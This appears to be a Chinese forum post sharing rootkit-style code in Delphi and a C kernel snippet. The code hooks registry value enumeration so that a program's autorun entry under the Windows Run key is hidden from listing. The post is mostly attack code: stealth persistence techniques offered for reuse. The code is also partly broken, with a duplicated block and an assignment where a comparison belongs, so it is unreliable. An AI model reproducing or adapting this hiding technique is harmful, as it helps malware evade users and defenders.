function RegQueryValueExWindex( name1:string):DWORD; var buf : array [0..255] of char; iRes : integer; hKeyx : HKEY; dwIndex, dwSize : DWORD; begin Result:=Cardinal(-1); if RegOpenKeyEx(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run\', 0, KEY_QUERY_VALUE, hKeyx ) = ERROR_SUCCESS then begin dwIndex := 0; repeat dwSize := 255; iRes := RegEnumValue( hKeyx, dwIndex, buf, dwSize ,nil,nil,nil,nil); if iRes = ERROR_NO_MORE_ITEMS then break else if (iRes = ERROR_SUCCESS) or (iRes = ERROR_MORE_DATA) then begin if buf=name1 then begin Result:=dwIndex; end; inc( dwIndex ); end; until iRes <> ERROR_SUCCESS; RegCloseKey( hKeyx ); end; end; PCardinal(Cardinal(View)+SizeOf(Cardinal)*3)^:=RegQueryValueExWindex('Project1');function RegEnumValueWCallback(hKey: HKEY; dwIndex: DWORD; lpValueName: PWideChar; var lpcbValueName: DWORD; lpReserved: Pointer; lpType: PDWORD; lpData: PByte; lpcbData: PDWORD): Longint; stdcall; var ObjectName:PWideChar;Length:Cardinal;RunName:UNICODE_STRING; begin GetMem(ObjectName,4096); if ObjectName<>nil then begin if NtQueryObject(hKey,1,ObjectName,4096,@Length)=0 then begin RunName.Buffer:='\Registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'; RunName.Length:=126; RunName.MaximumLength:=126; if RtlCompareUnicodeString(PUNICODE_STRING(ObjectName),@RunName,True)=0 then if dwIndex>=PCardinal(Cardinal(View)+SizeOf(Cardinal)*3)^ then Inc(dwIndex); end; FreeMem(ObjectName); end; Result:= RegEnumValueWNext(hKey,dwIndex,lpValueName,lpcbValueName,lpReserved,lpType,lpData,lpcbData);end;
核心部分 NTSTATUS ntstatus;
NTSTATUS status=STATUS_SUCCESS;
void *sjm;
ULONG vvb=0;
ULONG asp=100;
UNICODE_STRING zxm,yy;
PKEY_VALUE_BASIC_INFORMATION pvbi =(KEY_VALUE_BASIC_INFORMATION)ExAllocatePool(PagedPool,asp);
RtlInitUnicodeString(&yy,L"zhu");
ntstatus = ZHURUINAN( KeyHandle,Index,KeyValueInformationClass,KeyValueInformation, Length,ResultLength);
if( NT_SUCCESS( ntstatus ))
{
if (KeyValueInformationClass==0)
sjm = ((KEY_VALUE_BASIC_INFORMATION)KeyValueInformation)->Name;
if (sjm="Run")
{
status=ZwQueryValueKey(KeyHandle,&yy,KeyValuePartialInformation,pvbi,asp,&vvb);
if (NT_SUCCESS(status))
{
zxm.Length = zxm.MaximumLength =pvbi->NameLength;
zxm.Buffer = pvbi->Name;
if(wcsstr(zxm.Buffer,L"C:\\a.exe")!=NULL)
{
Index=Index+100;
}
}
}
ntstatus = ZHURUINAN(KeyHandle,Index,KeyValueInformationClass,KeyValueInformation,Length,ResultLength);
}
return ntstatus;
只是稍微参考一下
d的hook实在太少
var
buf : array [0..255] of char;
iRes : integer;
hKeyx : HKEY;
dwIndex, dwSize : DWORD;
begin
Result:=Cardinal(-1);
if RegOpenKeyEx(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\CurrentVersion\Run\', 0,
KEY_QUERY_VALUE, hKeyx ) = ERROR_SUCCESS then
begin
dwIndex := 0;
repeat
dwSize := 255;
iRes := RegEnumValue( hKeyx, dwIndex, buf, dwSize ,nil,nil,nil,nil);
if iRes = ERROR_NO_MORE_ITEMS then
break
else if (iRes = ERROR_SUCCESS) or (iRes = ERROR_MORE_DATA) then
begin
if buf=name1 then
begin
Result:=dwIndex;
end;
inc( dwIndex );
end;
until iRes <> ERROR_SUCCESS;
RegCloseKey( hKeyx );
end;
end;
PCardinal(Cardinal(View)+SizeOf(Cardinal)*3)^:=RegQueryValueExWindex('Project1');function RegEnumValueWCallback(hKey: HKEY; dwIndex: DWORD; lpValueName: PWideChar;
var lpcbValueName: DWORD; lpReserved: Pointer; lpType: PDWORD;
lpData: PByte; lpcbData: PDWORD): Longint; stdcall;
var ObjectName:PWideChar;Length:Cardinal;RunName:UNICODE_STRING;
begin
GetMem(ObjectName,4096);
if ObjectName<>nil then begin if NtQueryObject(hKey,1,ObjectName,4096,@Length)=0 then begin
RunName.Buffer:='\Registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'; RunName.Length:=126; RunName.MaximumLength:=126; if RtlCompareUnicodeString(PUNICODE_STRING(ObjectName),@RunName,True)=0 then
if dwIndex>=PCardinal(Cardinal(View)+SizeOf(Cardinal)*3)^ then Inc(dwIndex);
end;
FreeMem(ObjectName);
end; Result:= RegEnumValueWNext(hKey,dwIndex,lpValueName,lpcbValueName,lpReserved,lpType,lpData,lpcbData);end;